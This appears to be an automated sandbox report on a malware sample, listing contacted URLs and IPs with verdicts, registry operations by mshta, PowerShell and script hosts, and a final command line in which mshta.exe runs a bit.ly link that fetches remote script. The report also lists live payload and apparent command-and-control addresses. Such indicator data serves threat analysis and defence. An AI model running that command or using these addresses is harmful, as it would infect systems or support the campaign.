http://bukbukbukak.blogspot.com/p/9.html - 216.58.212.161 - GET MALICIOUS

https://bukbukbukak.blogspot.com/p/9.html - 216.58.212.161 - GET MALICIOUS

https://bukbukbukak.blogspot.com/js/cookienotice.js

- 216.58.212.161 - GET MALICIOUS

http://1230948%[email protected]/p/9.html/

- - - - SUSPICIOUS

https://www.bitly.com/ddwddwwkfwdwoooi - 67.199.248.14 - GET CLEAN

https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt

- 34.102.176.152 - GET CLEAN

https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt

- 34.102.176.152 - GET CLEAN

https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt

- 34.102.176.152 - GET CLEAN

https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_02df7f9ae2d74130872a6c4165f7ed60.txt

- - - - CLEAN

http://bitly.com/ddwddwwkfwdwoooi - 67.199.248.14 - GET CLEAN

http://pki.goog/gsr1/gsr1.crt - 216.239.32.29 - GET CLEAN

http://www.google.com - 172.217.23.100 - GET CLEAN

http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy

- 172.217.23.100 - GET CLEAN

http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php - 180.214.239.67 - POST CLEAN

https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html

- 216.58.212.161 - GET CLEAN

https://fckusecurityresearchermotherfkrs.blogspot.com/js/cookienotice.js

- 216.58.212.161 - GET CLEAN

https://www.blogger.com/static/v1/widgets/3822632116-css_bundle_v2.css

- - - GET CLEAN

https://www.blogger.com/static/v1/widgets/2583860411-widgets.js

- - - GET CLEAN

https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1

- 142.250.186.41 - GET CLEAN

https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js

- - - GET CLEAN

https://www.blogger.com/dyn-css/authorization.css?targetBlogID=644545533916229546&zx=551455ad-7f93-402f-89a1-d9e43c6794f5

- - - GET CLEAN

https://www.blogger.com/blogin.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&type=blog

- - - GET CLEAN

https://www.blogger.com/static/v1/v-css/281434096-static_pages.css

- - - GET CLEAN




https://fonts.googleapis.com/css?family=Open+Sans:300

- 142.250.74.202 - GET CLEAN

https://fonts.googleapis.com/css?lang=de&family=Product+Sans|Roboto:400,700

- 142.250.74.202 - GET CLEAN

https://www.google-analytics.com/analytics.js - - - GET CLEAN

https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/... ...s://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true

- 142.250.185.237 - GET CLEAN

https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3230375044160936909&zx=74bb4738-53be-4905-9fa3-25325b11a73a

- - - GET CLEAN

https://www.blogger.com/blogin.g?blogspotURL=https://bukbukbukak.blogspot.com/p/9.html&type=blog

- - - GET CLEAN

https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbukbukbukak.blogspot.com%2Fp%2F9.html&type=blog&bpli=1

- - - GET CLEAN

http://www.google.com/policies/terms/ - - - GET CLEAN

http://support.google.com/websearch/answer/86640

- - - GET CLEAN

https://www.google.com/recaptcha/api.js - - - GET CLEAN

https://fckusecurityresearchermotherfkrs.blogspot.com/favicon.ico

- - - GET CLEAN

https://fckusecurityresearchermotherfkrs.blogspot.com

- - - GET CLEAN

https://www.blogger.com - - - GET CLEAN

https://www.google.de/intl/de/about/products?tab=jh

- - - GET CLEAN

https://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app

- - - GET CLEAN

https://www.google.de/webhp?tab=jw - - - GET CLEAN

https://maps.google.de/maps?hl=de&tab=jl - - - GET CLEAN

https://www.youtube.com/?gl=DE&tab=j1 - - - GET CLEAN

https://play.google.com/?hl=de&tab=j8 - - - GET CLEAN

https://news.google.com/?tab=jn - - - GET CLEAN

https://mail.google.com/mail/?tab=jm - - - GET CLEAN

https://meet.google.com/?hs=197 - - - GET CLEAN

https://chat.google.com - - - GET CLEAN

https://contacts.google.com/?hl=de&tab=jC - - - GET CLEAN

https://drive.google.com/?tab=jo - - - GET CLEAN

https://calendar.google.com/calendar?tab=jc - - - GET CLEAN

https://translate.google.de/?hl=de&tab=jT - - - GET CLEAN

https://photos.google.com/?tab=jq&pageId=none - - - GET CLEAN

https://duo.google.com/?usp=duo_ald - - - GET CLEAN




https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO

- - - GET CLEAN

https://www.google.de/shopping?hl=de&source=og&tab=jf

- - - GET CLEAN

https://docs.google.com/document/?usp=docs_alc - - - GET CLEAN

https://docs.google.com/spreadsheets/?usp=sheets_alc

- - - GET CLEAN

https://docs.google.com/presentation/?usp=slides_alc

- - - GET CLEAN

https://books.google.de/?hl=de&tab=jp - - - GET CLEAN

https://www.blogger.com/?tab=jj - - - GET CLEAN

https://hangouts.google.com - - - GET CLEAN

https://keep.google.com - - - GET CLEAN

https://jamboard.google.com/?usp=jam_ald - - - GET CLEAN

https://earth.google.com/web/ - - - GET CLEAN

https://www.google.de/save - - - GET CLEAN

https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral

- - - GET CLEAN

https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2

- - - GET CLEAN

https://podcasts.google.com - - - GET CLEAN

https://stadia.google.com - - - GET CLEAN

https://www.google.com/travel/?dest_src=al - - - GET CLEAN

https://docs.google.com/forms/?usp=forms_alc - - - GET CLEAN

https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg

- - - GET CLEAN

https://www.blogger.com/age-verification.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&from=APq4FmCi5NBs1f3axOfaSfoosWI5gDvOWPuVdwMn7HZMV1Hu00EksHZcLZ8-Uz03byZEC6CvHoy-fLnoyhgJ3-myRV-oRFV6mg

- - - GET CLEAN

https://www.blogger.com/go/helpcenter - - - GET CLEAN

https://www.blogger.com/go/discuss - - - GET CLEAN

https://www.blogger.com/go/tutorials - - - GET CLEAN

https://www.blogger.com/go/buzz - - - GET CLEAN

https://www.blogger.com/go/devapi - - - GET CLEAN

https://www.blogger.com/go/devforum - - - GET CLEAN

https://www.blogger.com/go/terms - - - GET CLEAN

https://www.blogger.com/go/privacy - - - GET CLEAN

https://www.blogger.com/go/contentpolicy - - - GET CLEAN




Domain

Domain IP Address Country Protocols Verdict

https://www.google.de/contact/impressum.html - - - GET CLEAN

https://bukbukbukak.blogspot.com/favicon.ico - - - GET CLEAN

https://bukbukbukak.blogspot.com - - - GET CLEAN

bukbukbukak.blogspot.com 216.58.212.161 - HTTP, DNS, HTTPS MALICIOUS

www.bitly.com 67.199.248.15, 67.199.248.14 - HTTP, DNS, HTTPS CLEAN

92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com 34.102.176.152 - HTTP, DNS, HTTPS CLEAN

35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com 34.102.176.152 - HTTP, DNS, HTTPS CLEAN

bitly.com 67.199.248.15, 67.199.248.14 - HTTP, DNS CLEAN

fckusecurityresearchermotherfkrs.blogspot.com 216.58.212.161 - DNS, HTTPS CLEAN

blogspot.l.googleusercontent.com 216.58.212.161 - DNS CLEAN

pki.goog 216.239.32.29 - HTTP, DNS CLEAN

www.blogger.com 142.250.186.41 - HTTPS CLEAN

accounts.google.com 142.250.185.237 - HTTPS CLEAN

fonts.googleapis.com 142.250.74.202 - DNS, HTTPS CLEAN

www.google.com 172.217.23.100 - HTTP, DNS, HTTPS CLEAN

www.google-analytics.com - - HTTPS CLEAN

media-router.wixstatic.com 34.102.176.152 - DNS CLEAN

gcp.media-router.wixstatic.com 34.102.176.152 - DNS CLEAN

support.google.com - - HTTP CLEAN

www.google.de - - HTTPS CLEAN

myaccount.google.com - - HTTPS CLEAN

maps.google.de - - HTTPS CLEAN

www.youtube.com - - HTTPS CLEAN

play.google.com - - HTTPS CLEAN

news.google.com - - HTTPS CLEAN

mail.google.com - - HTTPS CLEAN

meet.google.com - - HTTPS CLEAN

chat.google.com - - HTTPS CLEAN

contacts.google.com - - HTTPS CLEAN

drive.google.com - - HTTPS CLEAN

calendar.google.com - - HTTPS CLEAN

translate.google.de - - HTTPS CLEAN

photos.google.com - - HTTPS CLEAN

duo.google.com - - HTTPS CLEAN



Domain IP Address Country Protocols Verdict

IP

IP Address Domains Country Protocols Verdict

Mutex

Name Operations Parent Process Name Verdict

Registry

Registry Key Operations Parent Process Name Verdict

docs.google.com - - HTTPS CLEAN

books.google.de - - HTTPS CLEAN

hangouts.google.com - - HTTPS CLEAN

keep.google.com - - HTTPS CLEAN

jamboard.google.com - - HTTPS CLEAN

earth.google.com - - HTTPS CLEAN

artsandculture.google.com - - HTTPS CLEAN

ads.google.com - - HTTPS CLEAN

podcasts.google.com - - HTTPS CLEAN

stadia.google.com - - HTTPS CLEAN

172.217.23.100 www.google.com United States HTTP, TCP, DNS, HTTPS MALICIOUS

34.102.176.152

gcp.media-router.wixstatic.com, media-router.wixstatic.com, 92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com,35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com

United States TCP, DNS, HTTPS MALICIOUS

180.214.239.67 - Vietnam TCP, HTTP MALICIOUS

192.168.0.1 - - UDP, DNS CLEAN

216.58.212.161blogspot.l.googleusercontent.com,bukbukbukak.blogspot.com,fckusecurityresearchermotherfkrs.blogspot.com

United States HTTP, TCP, DNS, HTTPS CLEAN

67.199.248.14 www.bitly.com, bitly.com United States HTTP, TCP, DNS, HTTPS CLEAN

142.250.186.41blogger.l.google.com, www.blogger.com,resources.blogblog.com

United States TCP, DNS, HTTPS CLEAN

216.239.32.29 pki.goog United States HTTP, TCP, DNS CLEAN

142.250.185.237 accounts.google.com United States TCP, DNS, HTTPS CLEAN

142.250.74.202 fonts.googleapis.com United States TCP, DNS, HTTPS CLEAN

172.217.23.110www.google-analytics.com, www-google-analytics.l.google.com

United States TCP, DNS, HTTPS CLEAN

67.199.248.15 www.bitly.com, bitly.com United States DNS CLEAN

Local\!PrivacIE!SharedMemory!Mutex access mshta.exe CLEAN

HKEY_CURRENT_USER\Software\cookerr access, write mshta.exe SUSPICIOUS

HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32

access, read mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\InternetExplorer\Main\FeatureControl

access mshta.exe CLEAN

HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Main\FeatureControl





HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR





HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\PageSetup


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\PageSetup\Print_Background


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_XSSFILTER


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_XSSFILTER


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME





HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsScript\Features


HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\COM+Enabled access, read mshta.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Isolate_Named_Windows


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Isolate_Named_Windows


HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting access aspnet_compiler.exe, mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting\Default Impersonation Level

access, read aspnet_compiler.exe, mshta.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ





HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_IMG


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_IMG


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP


HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SKIP_LEAK_CLEANUP_AT_SHUTDOWN_KB835183


HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SKIP_LEAK_CLEANUP_AT_SHUTDOWN_KB835183


HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

access powershell.exe CLEAN

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging


HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment


HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment\__PSLockdownPolicy

access, read powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion

access aspnet_compiler.exe, powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\InstallationType

access, read aspnet_compiler.exe, powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseHttpPipeliningAndBufferPooling


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseSafeSynchronousClose


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseSafeSynchronousClose





HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictRfcInterimResponseHandling


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowDangerousUnicodeDecompositions


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowDangerousUnicodeDecompositions


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.UseStrictIPv6AddressParsing


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictIPv6AddressParsing


HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine


HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine\ApplicationBase

access, read powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowAllUriEncodingExpansion


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowAllUriEncodingExpansion


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchSendAuxRecord


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SystemDefaultTlsVersions


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\RequireCertificateEKUs


HKEY_PERFORMANCE_DATA access powershell.exe CLEAN

HKEY_CURRENT_USER access aspnet_compiler.exe, powershell.exe CLEAN

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections


HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access aspnet_compiler.exe, powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport


HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext


HKEY_LOCAL_MACHINE access aspnet_compiler.exe, powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework access aspnet_compiler.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgJITDebugLaunchSetting

access, read aspnet_compiler.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgManagedDebugger





Reduced dataset

Process

Process Name Commandline Verdict

HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings

access, create wscript.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings

access, create wscript.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\IgnoreUserSettings

access, read wscript.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\Enabled


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\Enabled


HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\LogSecuritySuccesses


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\LogSecuritySuccesses


HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\TrustPolicy


HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\UseWINSAFER


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\TrustPolicy


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\UseWINSAFER


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\Timeout


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\DisplayLogo


HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\Timeout


HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\DisplayLogo


HKEY_CLASSES_ROOT\.vbs access, read wscript.exe CLEAN

HKEY_CLASSES_ROOT\VBSFile\ScriptEngine access, read wscript.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting\Default Namespace


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\WMIDisableCOMSecurity


mshta.exe C:\Windows\SysWOW64\mshta.exe https://www.bitly.com/ddwddwwkfwdwoooi SUSPICIOUS

